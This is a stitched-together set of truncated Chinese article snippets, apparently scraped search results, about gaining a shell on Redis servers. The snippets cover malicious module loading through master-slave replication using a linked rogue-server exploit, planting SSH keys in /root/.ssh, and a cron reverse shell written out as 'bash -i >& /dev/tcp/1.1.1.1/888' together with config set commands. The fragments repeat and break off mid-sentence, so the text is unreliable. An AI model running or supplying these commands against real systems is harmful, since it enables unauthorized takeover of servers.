在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在Redis中实现一个新的Redis命令,通过写C语言编译并加载恶意的.so文件,达到代码执行的目的。 通过脚本实现一键自动化getshell: 1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成。 代码语言:javascript 代码
通过主从同步getshell利用的就是1.4主从同步机制,原理是将将受害机设为主从模式,主端为攻击端,攻击端将恶意.so文件同步到受害端,通过module load命令加载.so文件,从而实现命令执行。exp地址:https://github.com/n0b0dyCN/redis-rogue-server 大致步骤如下:(1)攻击->受害:slave of xx.xx.xx.xx(攻击端)(2)...
反弹shell成功! 0X05 写入SSH公钥实现SSH登录 利用原理 原理就是在数据库中插入一条数据,将本机的公钥作为value值,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生一个授权的key。 利用条件 知道启动服务的用...
在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在Redis中实现一个新的Redis命令,通过写C语言编译并加载恶意的.so文件,达到代码执行的目的。 通过脚本实现一键自动化getshell: 1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成。 git clone https://github.com/n0b0dyCN/RedisMo...
通过主从复制的getshell攻击,攻击者可以获取主节点的控制权,进而对整个Redis系统进行控制和破坏。 主从复制getshell的攻击原理主要为以下几点: 1.伪造从节点: 攻击者首先在本地搭建一个Redis实例,将其伪装成一个从节点。攻击者必须获取到主节点的IP地址和端口号,并在伪造的从节点上设置连接主节点的IP和端口信息。
Getshell原理 在redis 4.x之后的版本中,允许以模块化的形式从外部加载.so文件,而这个文件中代码将会变成redis功能的一部分,从而实现功能扩展。我们利用这个功能通过编译恶意的.so文件,并将该文件同步到从属redis上,进行加载,即可实现恶意代码的功能。 过程 ...
Redis主从复制与getshell 导言 随着互联网的快速发展,数据存储和处理变得越来越重要。在这个背景下,Redis作为一种高性能的键值存储数据库,受到了广泛的关注和应用。Redis的主从复制功能是其重要的特性之一,它可以提供数据的高可用性和可扩展性。然而,如果不加以限制和安全措施,主从复制也可能导致getshell漏洞,使得攻击者...
当拿到数据库权限是不会满足我们的,我们的目标只有一个getshell! 目前较主流的两个方法,第一种定时计划反弹shell、第二种利用主从复制rce。 2、定时计划反弹shell 1)set x “\n * bash -i >& /dev/tcp/1.1.1.1/888 0>&1\n” 2)config set dir /var/spool/cron/ 3)config set dbfilename root 4...
关于“redis主从复制getshell”的问题,首先需要明确的是,Redis主从复制机制本身并不是一个直接的安全漏洞,而是一种用于数据冗余和负载均衡的机制。然而,不当的配置或管理可能导致安全风险,进而可能被攻击者利用来获取服务器访问权限(包括shell)。 下面,我将按照您的提示分点回答,并尽量提供清晰的解释和相关的代码或概念...